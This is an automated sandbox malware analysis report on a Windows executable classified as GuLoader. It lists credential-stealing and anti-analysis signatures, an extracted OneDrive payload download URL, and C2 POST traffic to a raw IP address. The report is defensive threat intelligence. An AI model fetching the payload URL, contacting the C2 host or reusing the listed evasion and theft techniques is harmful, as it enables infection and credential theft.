Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report KHAWATMI CO.IMPORT & EXPORT.exe

Overview

General Information

Sample Name:KHAWATMI CO.IMPORT & EXPORT.exe
Analysis ID:458277
MD5:0153ae8cf4b1f546721332b5cb3f973c
SHA1:479858ef740172cb3791527a9c9d0da76eec3af4
SHA256:97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: KHAWATMI CO.IMPORT & EXPORT.exeReversingLabs: Detection: 13%
    Source: KHAWATMI CO.IMPORT & EXPORT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cid=7B0580AA0B18AE
    Source: Joe Sandbox ViewIP Address: 185.227.139.18 185.227.139.18
    Source: global trafficHTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
    Source: global trafficHTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
    Source: global trafficHTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 163Connection: close
    Source: global trafficHTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 163Connection: close
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownTCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknownDNS traffic detected: queries for: onedrive.live.com
    Source: unknownHTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Aug 2021 06:12:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_004028B8 GetAsyncKeyState,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1611B NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1A932 NtWriteVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D166C6 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D151C1 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D145CD NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D14DF2 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16BFE NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D153E5 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10BEC NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16795 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D8D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D157AF NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D14F79 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15B65 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1556D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15B03 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D14CD1 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D152C9 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D158CD NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B4F9 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D126E7 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15681 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15072 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1547B NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1347D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15A25 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 24_2_0056B6B4 LdrInitializeThunk,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 24_2_0056B7E6 Sleep,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 24_2_0056B811 NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 24_2_0056B727 NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 24_2_0056B6AD LdrInitializeThunk,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1ADC1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B3EA
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1611B
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1A932
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F36
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D166C6
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10680
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D107D1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FD4
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D151C1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D145CD
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1ADCD
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B1CF
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FCE
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D14DF2
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FF2
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D111F5
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D123F9
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D135F9
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16BFE
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D153E5
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D163E6
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10BEC
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FEC
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1A18A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D8D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D145B3
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D197B7
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D117A1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1AFA5
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D157AF
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D149AE
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F51
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D13951
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1415D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11546
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1374E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F77
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D14F79
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1317D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18F7D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D12F7E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10361
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1556D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1131A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1311C
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D12B1E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15B03
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11107
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D39
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19F3A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16D27
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19529
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1AF29
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1972D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D14CD1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D134D3
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D140DC
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D152C9
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D158CD
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B4F9
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11EE2
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D108E5
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D126E7
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D194E6
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B091
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15681
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B6B4
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1AEBB
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1AE57
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1964D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15072
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19E75
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1547B
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1347D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11665
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1141F
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16C1E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1B036
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18C3C
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1303F
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D15A25
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D13827
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.603288987.00000000021F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000000.601895516.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029860319.000000001DEC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029835895.000000001DD70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exeBinary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7B66B65AC3863AED.TMPJump to behavior
    Source: KHAWATMI CO.IMPORT & EXPORT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: KHAWATMI CO.IMPORT & EXPORT.exeReversingLabs: Detection: 13%
